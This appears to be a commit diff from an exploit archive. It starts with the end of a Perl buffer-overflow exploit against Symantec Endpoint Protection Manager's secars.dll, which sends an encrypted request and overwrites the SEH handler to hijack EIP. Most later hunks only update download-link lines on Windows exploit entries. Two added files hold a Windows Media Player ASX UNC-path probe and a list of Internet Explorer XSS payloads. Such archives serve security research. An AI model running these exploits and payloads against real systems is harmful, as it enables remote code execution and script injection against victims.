my $Kcs_hex = "85FB05B288B45D92447A3EDCBEFC434E";
# ---- config end -----
# flush after every write
$| = 1;
# Send HTTP request function
sub send_request {
my $param = shift; # URL parameters
my $post_data = shift; # POST DATA
my $sock = IO::Socket::INET->new("$host:$port");
if($sock){
print "Connected.. \n";
# HTTP request
my $req =
"POST /secars/secars.dll?h=$param HTTP/1.0\r\n" .
"User-Agent: Smc\r\n" .
"Host: $host\r\n" .
"Content-Length: " . length($post_data) . "\r\n" .
"\r\n" .
$post_data ;
# Sending
print $sock $req;
# Read HTTP response
my $resp = '';
while(<$sock>){ $resp .=$_; }
#print $resp;
if($resp =~ /400 Bad Request/) {
print "\nERROR: Got '400 Bad Request' from the server. Wrong Kcs key ? Wrong SEP version ?\n";
}
close $sock;
}
}
# SEP object
my $sep = SEPM::SEPM->new();
print "[*] Target: $host:$port\n";
print "[*] KCS Key: $Kcs_hex\n";
# SEPM object for obfuscation
print "[*] Generating master encryption key\n";
$sep->genkey($Kcs_hex);
# Obfuscate URL parameters
print "[*] Encrypting URI\n";
my $h = $sep->obfuscate("l=9&action=26");
# The evil buff
print "[*] Building evil buffer\n";
my $buf =
"foo=[hex]" . # [hex] call the vulnerable parsing function
"F" x 1288 . # Junk
"B" x 8 . # Pointer to next SEH record
"CCCCCCCC". # SEH Handler, will overwrite EIP register
"D" x 500; # Trigger "Memory Access Violation" exception
# Sending request
print "[*] Sending HTTP request\n";
send_request($h, # URL parameters
$buf # post data
);
print "[*] Done\n";

2
platforms/windows/local/17473.txt
View file

@ -16,5 +16,5 @@
# also check here for The Persian docs of this methods and more :
http://www.0days.ir/article/
Exploit: http://www.exploit-db.com/sploits/cve-2011-0611_exploit.pdf
Exploit-DB mirror: http://www.exploit-db.com/sploits/cve-2011-0611_exploit.pdf

16
platforms/windows/local/17474.txt
View file

@ -10,17 +10,15 @@ Exploit
# It gracefully bypass DEP/ASLR in MS Office 2010,
# and we named this method "Ikazuchi DEP/ASRL Bypass" : >
# unfortunately msgr3en.dll loads a few seconds after opining office,
# so just need to open open Office , and then open exploit after a few
second and saw a nice calc.
# so just need to open open Office , and then open exploit after a few second and saw a nice calc.
#
# The Arashi : http://abysssec.com/files/The_Arashi.pdf
http://www.exploit-db.com/download_pdf/17469
# http://www.exploit-db.com/download_pdf/17469
#
# me : twitter.com/ponez
# aslo check here for Persian docs of this methods and more :
http://www.0days.ir/article/
# http://www.0days.ir/article/
Exploit: http://www.exploit-db.com/sploits/cve-2011-3333_exploit.doc
#
@ -147,4 +145,8 @@ stores in stack :D
RETN
# KABOOM !!!
Exploit: http://www.exploit-db.com/sploits/cve-2011-3333_exploit.doc
Exploit-DB mirror: http://www.exploit-db.com/sploits/cve-2011-3333_exploit.doc

2
platforms/windows/local/29881.txt
View file

@ -3,7 +3,7 @@ Somehow, our script got on to the Russian forums :/
@w3bd3vil and @abh1sek
Exploit: http://www.exploit-db.com/sploits/29881.tar.gz
Exploit-DB mirror: http://www.exploit-db.com/sploits/29881.tar.gz
Adobe Acrobat Reader ASLR/DEP bypass Exploit with SANDBOX BYPASS
=================================================================

2
platforms/windows/local/30007.txt
View file

@ -32,4 +32,4 @@ Trendmicro, CDC
Exploit: http://www.exploit-db.com/sploits/30007.zip
Exploit-DB mirror: http://www.exploit-db.com/sploits/30007.zip

2
platforms/windows/local/31895.txt
View file

@ -30,4 +30,4 @@ The expolit is in the file attatchment named shellcode.txt
2? Select all the content in the editor
3? Click Menu Plugins->CCompletion->Go to identifier (Open in firt view) F11
Exploit: http://www.exploit-db.com/sploits/31895.7z
Exploit-DB mirror: http://www.exploit-db.com/sploits/31895.7z

3
platforms/windows/remote/20547.txt
View file

@ -19,6 +19,7 @@
which allows remote attackers to execute arbitrary code by accessing an object that (1)
was not properly initialized or (2) is deleted, aka "Time Element Memory Corruption Vulnerability."
Download Exploit : http://www.exploit-db.com/sploits/20547.rar
Exploit-DB mirror: http://www.exploit-db.com/sploits/20547.rar

2
platforms/windows/remote/20758.c
View file

@ -8,7 +8,7 @@ Version: 0.3z R2
Tested on: Windows XP SP3, Windows 7 Ultimate SP1, Windows Server 2003,
Windows Server 2008, it should work on all Windows.
Full Exploit: http://www.exploit-db.com/sploits/20758.tar.gz
Exploit-DB mirror: http://www.exploit-db.com/sploits/20758.tar.gz
*/
#include "main.h"

2
platforms/windows/remote/32851.html
View file

@ -13,7 +13,7 @@
Generation:
c:\mxmlc\bin>mxmlc.exe AsXploit.as -o AsXploit.swf
E-DB Note: http://www.exploit-db.com/sploits/32851-AsXploit.as
Exploit-DB mirror: http://www.exploit-db.com/sploits/32851-AsXploit.as
-->

16
platforms/windows/remote/33035.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/35335/info
Microsoft Windows Media Player is prone to multiple information-disclosure vulnerabilities because it fails to properly restrict access to certain functionality when handling media files.
An attacker can exploit these vulnerabilities to obtain information that may aid in further attacks.
<ASX version="3.0">
<ENTRY>
<REF href="file://c:/test.wma"/>
</ENTRY>
</ASX>
The following command may be used to discover hosts:
file://\\<IP>\c$\a.mp3

7
platforms/windows/remote/33050.html Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/35455/info
Microsoft Internet Explorer is prone to a security-bypass vulnerability because it fails to properly enforce restrictions on script behavior.
An attacker may exploit this issue to bypass restrictions on the execution of JavaScript code. This may aid in further attacks.
<STYLE>@import 'javascript:alert("xss1")';</STYLE> <IMG SRC=javascript:alert('XSS2')> <BODY BACKGROUND="javascript:alert('XSS3')"> <LINK REL="stylesheet" HREF="javascript:alert('XSS4');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');"> <IFRAME SRC="javascript:alert('XSS6');"></IFRAME> <DIV STYLE="background-image: url(javascript:alert('XSS7'))"> <STYLE>.XSS{background-image:url("javascript:alert('XSS8')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS9')")}</STYLE> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS10')></OBJECT> <STYLE>@import'http://example.com/xss.css';</STYLE> <script SRC="javascript:alert('xss11');"></script> <video SRC="javascript:alert('xss12');"</video> <LAYER SRC="javascript:alert('xss13')"></LAYER> <embed src="javascript:alert('xss14')" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed> <applet src="javascript:alert('xss15')" type=text/html>